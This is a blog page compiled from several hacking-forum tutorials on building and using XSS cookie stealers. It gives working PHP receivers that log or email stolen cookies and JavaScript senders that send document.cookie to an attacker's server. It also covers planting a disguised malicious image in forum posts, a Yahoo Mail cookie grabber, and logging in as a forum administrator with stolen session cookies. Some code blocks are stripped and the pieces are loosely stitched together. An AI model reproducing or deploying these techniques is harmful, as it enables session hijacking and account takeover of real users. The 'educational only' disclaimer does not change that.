Friday, May 9, 2008

> How To Make And Test A Cookie Stealer, extended from Freakwolfe's Tutorial

If you are viewing this topic, you probably are having trouble getting your cookie stealer to work. If you haven't read Freakwolfe's tutorial, read that first.


Now if you've read Freakwolfe's tutorial and still need help, the code isn't the problem.


Quick Notes:
I will not be going over what each part of the code does, Freakwolfe has already done that.
I may edit, add, remove or rephrase as necessary.
I am not responsible for the use of this. Use at your own risk.


If you want your stealer to be more "unnoticable", you might want to change the page from stealer.php to something less suspicious and noticable, such as step2.php or continue.php - just make sure that you change every instance of stealer.php to what you renamed it to.

And the code you put in index.php can be put in any page. Just make sure that all files mentioned are in the same directory.

Javascript is used multiple times. You will need to remove the space between java and script for it to work properly. To notify you of this, there will be Javascript Alert! and Javascript Alert End in sections with the javascript code.




index.php code:


You will need to put the following code somewhere in the document, where you want the cookie stealer link to be:

Javascript Alert!
CODE
Click here!

Javascript Alert End
(You might want to change what the link says... (IMG:style_emoticons/default/wink.gif) )

stealer.php code:


Put this code in the stealer.php file in the directory you wish the cookie stealer to be in. If you already have a page that you want to include the stealer in, put it at the top of the source.

CODE
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>


___________

Now you must create a new file: cookielog.txt

Don't worry about changing the name, nobody will know about it, and you won't have to edit the stealer.php code.

Now if you want your cookie stealer to work, make sure you CHMOD your cookielog.txt file to 777 or drwxrwxrwx

That will allow the cookie stealer to write to the file so that you can capture the information.



You know should have your cookie stealer successfully set up.


Testing It Out

1. To test out your cookie stealer, open a new tab or window (so that you can follow this).

2. Type (or copey & paste) the following into the URL in that new tab or window, not the current one (i.e. the one you are reading this in) and press enter:

Javascript Alert!
CODE
java script:void(document.cookie="test=working");alert(document.cookie);

Javascript Alert End
Once you press enter, you should see an alert box that says "test=working" without quotes.


3. Now go to your site where the link is in the tab or window you entered the javascript injection (the code directly above in step 2) in.

4. Click the link. If you are brought to a blank page, that is good.

5. Download and open, or view your cookielog.txt file. You should have a line of text that says "testing=working" without quotes. If so, your cookie stealer is working! Congratz!


Common mistakes:

Forgetting to create cookielog.txt
Forgetting to change the permissions of the file to 777 (CHMOD)
Forgetting to remove the space in javascript - a space is added for security reasons in posts on this site.


_____________________________________________________

If you are still having trouble, I have created a video.

The video is located at this link. There is a link on that page (you can't miss it) to download the zip folder.

To watch the video:
Download the folder.
Extract it.
There will be one file: cookie.avi
Open cookie.avi in Windows Media Player.
Watch the video.

Some side notes:

My OS is not Vista. It's XP. I used a Vista Transformation Pack that I found on PCWorld for free to make it look and feel like Vista, without the hassles of Vista. You get the good of Vista with the good of XP.
I used CamStudio to make the video. CamStudio is freeware.

Sorry for the crappy quality - I had to make it a REALLY small file size by lowering the quality to 45% - enough to read the text but small enough to be less than 5 mb when compressed.


If you have any questions about the video, feel free to ask me or send me a PM.
_____________________________________________________


Mods, if you feel anything should be added, changed, or removed, please pm me or do it yourself.

Y! Cookie Stealer script!!

Yahoo security weakness
- cookie stoler -
Today status - Unpatched

This script can help anyone to acces victims inbox without knowing the password
Only works on IE 5x-6x and only with old Yahoo mailboxes (not with the Beta version)
=========================================================================== ==============================
The Script:
==============================

Some text here

-

==============================
Php grabber (mail sender):
==============================

$to=" myemail@yahoo.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it ";
$subject="ID: ".$_GET["id"];
$message="ID: ".$_GET["id"]."\nCookies: \n".$_GET["cookie"]."\nIp: ".$_SERVER["REMOTE_ADDR"];
mail($to,$subject,$message, "From: cookies@lod.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it ");

header("Expires: Mon, 28 jun 2007 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

?>

Cookie stealer only works in Firefox not IE 6 or 7

Cookie stealer only works in Firefox not IE 6 or 7

Is the problem the part?

I used this:

(I didnt use a .gif file but a .html file)

Smile Steal Forum Cookies With Gif
How To Steal Cookies From A Forum With A Gif And Login With Admin Privileges Without Hash Cracking !
Use Firefox Because It's The Best Browser On The Web
U Can Download The ADD N EDIT COOKIE HACK HERE:
Code:

https://addons.mozilla.org/firefox/573/

Tested On Invision Power Board 2.1.7 <- And This Xploit Works On Much Boards !

Ok Lets Start Now

Here Is Some Files U Need...

1. ) -> Copy the below code,paste in notepad or ur fav text editor and save as cookiestealer.php (Note : Save it as cookiestealer.php not cookiestealer.php.txt)

cookiestealer.php
Code:

$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo ".";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo ".";
exit;
}
}
echo ".";
fclose($handle);
exit;
}
echo ".";
exit;
?>

2. ) Make a new text file and name it logfile.txt and chmod it 777 .

3. ) The malicious file fun.gif (It will redirect user to cookie stealer) .. Copy the below code and save it as fun.gif

Code:



4. ) And a real image miniature (to show to the victim)

Ok now we have 4 files as listed below :

1. ) cookiestealer.php
2. ) logfile.txt
3. ) fun.gif
4. ) And a real image (any)

lets start now ..

Upload these files to your webspace example :

fun.gif (ftp) -> www.yoursite.com/fun.gif
cookiestealer.php (ftp) -> www.yoursite.com/cookiestealer.php
logfile.txt (ftp) -> www.yoursite.com/logfile.txt


ok now go on the victim forum .. Suppose victim forum is www.victim.com/forum/index.php

Post a new topic or reply or we can insert the malicious gif in the signature ... or where we can .. but now i do
a new topic with this bbcode :
PHP Code:

with this bbcode the victim don't see the fun.gif but the real image miniature and when he click on it ,he has a redirect
to the cookiestealer ... and we can see his cookies on :

http://yoursite.com/logfile.txt

when we have cookies we go to firefox and with the addon add n edit cookies i login with admin privileges... (first login with any user then edit cookies)

Now reload the page and you will logged in like the administrator


Enj0y.

How To Make A Cookie Stealer?

I've explained this process several times to several different people, so I thought I'd just make one thread for it. If you have any questions or additional information, post it here.

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.


Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.


First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

CODE
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.


Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

CODE
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5
Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.


Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

HTML
<script language="JavaScript"> // Line 1
document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie; // Line 2
</script> // Line 3
Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).


There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

You can trick the victim into clicking a link which activates the sender. For example:
HTML
<a href="java script:document.location='http://www.host.com/mysite/stealer.php?cookie='+document.cookie;">Click here!</a>
(remove the space in "javascript")

Another method I discovered is putting...
HTML
<script>document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script>
...into my user-agent.



Free PHP hosts:
http://www.0php.com/free_PHP_webhosting.php
http://www.free-webhosts.com/free-php-webhosting.php


Do not ask what a cookie stealer is or how to use one; such questions have already been answered in this thread. Please read the entire thread before asking a question. If you have thoroughly read the thread and are still having difficulty, post your questions intelligently. Otherwise, I will close the thread again.

Disclaimer :

I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!

This is a Genuine Article.

Will try to add in as much as possible
keep posting !
comment on this article !